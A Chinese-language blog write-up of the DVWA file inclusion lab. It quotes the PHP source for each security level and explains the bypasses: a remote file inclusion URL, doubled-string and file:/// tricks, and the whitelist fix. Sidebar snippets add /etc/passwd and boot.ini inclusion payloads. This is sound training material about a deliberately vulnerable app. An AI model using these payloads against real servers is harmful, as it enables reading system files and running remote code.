DVWA------文件包含(2)

最新推荐文章于 2021-04-09 20:17:12 发布
最新推荐文章于 2021-04-09 20:17:12 发布
阅读量419 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: DVWA web安全 文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Grant/article/details/100610383
版权

文章目录

一,DVWA的练习

在这里插入图片描述
先在php的配置文件中设置允许打开和包含远程文件
在这里插入图片描述

(1)low安全级别

【源码分析】

<?php
// The page we wish to display 
$file = $_GET[ 'page' ];
?>

服务器端对page参数没有做任何的过滤跟检查;

服务器期望用户的操作是点击下面的三个链接,服务器会包含相应的文件,并将结果返回;
在这里插入图片描述

【exp】

①传参,通过显示结果查看操作系统的类型,以及站点的目录;

在这里插入图片描述

在这里插入图片描述

②显示php探针

在这里插入图片描述

③远程文件包含
http://192.168.44.131/dvwa/vulnerabilities/fi/?page=http://IP/XXX.php

在这里插入图片描述

(2)media安全等级

【源码】

 <?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

源码作用

  • str_replace()函数将“http://”,“https://”, “../”,“..\”替换为空;
    .

绕过思路

  • 复写绕过
  • 使用file:///方式绕过

【exp】

在这里插入图片描述

(3)high安全等级

【源码】

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

代码设计目的

  • fnmatch()函数检查page参数,要求page参数必须以file开头,且不等于include.php

.
绕过思路

  • 可以使用file:///方式绕过;

在这里插入图片描述
【exp】
在这里插入图片描述

(4)impossibe安全等级

【源码】

 <?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

可以看到设计思路是默认拒绝的白名单思路
只允许规定的文件包含操作

冗长
关注
专栏目录
20201223DVWA-文件包含file-include)模块全难度详解
qq_45290991的博客
01-13 563
目录 文件包含漏洞简介 low medium high impossible 文件包含漏洞简介 先说一下文件包含漏洞吧,一般做题的话看到include、include-once、require、require-once这一类的带有“包含”的英文,就可以猜测带有这类漏洞 low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 1.观察: 分别点击三个文件,可以通过观察看到,url分别.
DVWA-文件包含
Darklord.W
04-09 218
低中高步骤截图 低: 未进行任何过滤 http://192.168.8.135/dvwa/vulnerabilities/fi/?page=/etc/passwd 查看目录 http://192.168.8.135/dvwa/vulnerabilities/fi/?page=c:\boot.ini http://192.168.8.135/dvwa/vul...
DVWA练习之File Inclusion
dz919908651的博客
08-22 1376
DVWA练习之File Inclusion 本博客将记录在web安全问题中一种常见的漏洞——“文件包含漏洞的实践演练。首先阐述文件漏洞的概念,原理,最后展示基于DVWA的各种等级的文件包含漏洞文件包含 概念:指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任...
2.File Upload(Low)——小白笔记——DVWA
qwsn
11-15 1548
0x01:Webshell 1.Webshell是什么? Webshell:包含用来连接靶机服务器操作系统的恶意代码的文件 2.怎么生产Webshell 通过中国菜刀(weevely)生产Webshell 0x02:Low级别的DVWA测试 1.上源码: File Upload Source: <?php if( isset( $_POST[ 'Upload' ] ) ) { ...
DVWA问题1:DVWA System error - config file not found.
烟敛寒林的博客
04-16 6098
访问DVWA时,出现如下错误提示: DVWA System error - config file not found. Copy config/config.inc.PHP.dist to config/config.inc.php and configure to your environment. 意思是: DVWA系统错误——找不到配置文件。 请复制config目录下的con...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master安装包
02-28
4. **文件包含漏洞**:当程序允许用户指定要加载的文件时,不正确的验证可能导致恶意文件被包含,从而执行任意代码。 5. **弱认证与授权**:包括弱密码策略、会话劫持等,这些错误可能导致账户被轻易破解或未经授权...
DVWA-master.7z 压缩包
09-14
- 文件包含漏洞:允许攻击者将外部文件内容包含到应用中,可能导致代码执行或信息泄露。 - 弱认证与会话管理:不安全的登录机制或会话管理可能导致账户被劫持。 - 逻辑漏洞:应用逻辑错误可能让攻击者绕过安全控制。...
DVWA-master.rar
03-15
这个RAR文件包含了一个完整的DVWA源代码库。 2. **环境搭建**: `DVWA`需要一个运行PHP的服务器环境,如PHPStudy。PHPStudy是一个集成的开发环境,包含Apache和PHP,可以方便地在本地运行DVWA。安装PHPStudy后,将...
针对DVWA-sql注入写的exp
MzHeader的博客
03-24 588
SQL Injection(sql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手...
2013phpweb漏洞利用EXP
03-28
2013phpweb漏洞利用EXP
动态时间规整算法(DTW)通俗易懂
Barbara‘s Blog
04-08 1万+
动态时间规整算法(Dynamic Time Warping ) 来源: -假定一个孤立词识别系统,利用模板匹配法进行识别。训练阶段,用户将词汇表种每一个词都念一遍,将其特征矢量的时间序列作为模板(template)存入模板库;识别阶段,将输入语音的特征矢量时间序列与模板库中的每个模板进行相似度比较,将相似度最高的最为识别输出。 -实际上,这样做识别率很低,因为语音信号随机性太强了,同一个人在不同时刻讲同一句话,发同一个音,也不可能具有完全相同的时间长度。 -对此,日本学者板仓(Itakura)将动态规划算法
DVWA-Command injection(命令注入)
MzHeader的博客
03-22 663
DWVA-Command injection(命令注入) 介绍: 命令执行漏洞的产生原因一般就是将用户输入未经过滤或者过滤不严就直接当作系统命令进行执行,我们可以通过批处理中的一些技巧来一次执行多条命令,这样就可以执行任意命令。在命令执行中,常用的命令连接符号有五个:&& & || | ; &&:前一个指令执行成功,后面的指令才继续执行,就像进行与操作一样 ...
DVWA】--- 四、文件包含(File Inclusion)
qq_43168364的博客
05-31 544
sh
dvwa学习编写exp
p_utao的博客
04-09 281
sql注入报错exp import requests import re //cookie验证登录 cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'} //可能存在sql注入地址 url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1" //index()函数用于从列表中找出某个值第一个匹配项的索引位置 //split()通过指定分
DTW基本原理
梦中有code
11-05 2万+
设时间归正函数为:,式中,N为路径长度,c(n)=(i(n),j(n))表示第n个匹配点对是由参考模板的第i个特征矢量与待测模板的第j个特征矢量构成的匹配点对。两者之间的距离称为局部匹配距离。DTW算法就是通过局部优化的方法实现加权距离总和最小,即 ,式中,加权函数的选取应考虑两个因素: 根据第n对匹配点前一步局部路径的走向来选取,惩罚45度方向的局部路径,以便适应的情况 考虑语音各部分...
DVWA_文件包含_中级+高级绕过方法
sx234com的博客
04-09 1888
1、中级 代码如下: 代码是过滤http://与https:// 的代码为"" 绕过思路: 构造绕过结构:例如 hthttp://tp:// 中间被代替成""后 剩下的字符任然是 http:// 成功绕过。 ...
DTW算法(语音识别)
热门推荐
网络知识精读
01-25 4万+
DTW主要是应用在孤立词识别的算法,用来识别一些特定的指令比较好用,这个算法是基于DP(动态规划)的算法基础上发展而来的。这里介绍语音识别就先介绍下语音识别的框架,首先我们要有一个比对的模版声音,然后需要去截取其里面包含真正属于语音的部分,这个要采用一个叫做vad(voice activedetection)语音活动检测的算法,而在vad中间我们最常使用双门限端点检测这种方法,如图所示,我们采用v
XSS-----跨站脚本攻击漏洞的概念和危害
Z_Grant的博客
08-25 1万+
感谢邱永华先生写出这么好的关于XSS的书!! 《XSS跨站脚本攻击剖析与防御》 文章目录一,基础概念(1)概念(2)危害(3)分类3.1 反射型跨站脚本3.2 存储型跨站脚本(4)发掘二,XSS-filter绕过(1) 什么时XSS-filter 一,基础概念 (1)概念 跨站脚本攻击(Cross Site Script) 跨站脚本 ( Cross-Site Scriptin ) 是由于Web...
DVWA-master
最新发布
11-08
DVWA-master包含多个漏洞,例如SQL注入,XSS攻击和文件包含漏洞等,用户可以使用这些漏洞来测试自己的Web应用程序是否存在安全漏洞DVWA-master还提供了不同的安全级别,从易到难,以帮助用户逐步了解和学习Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值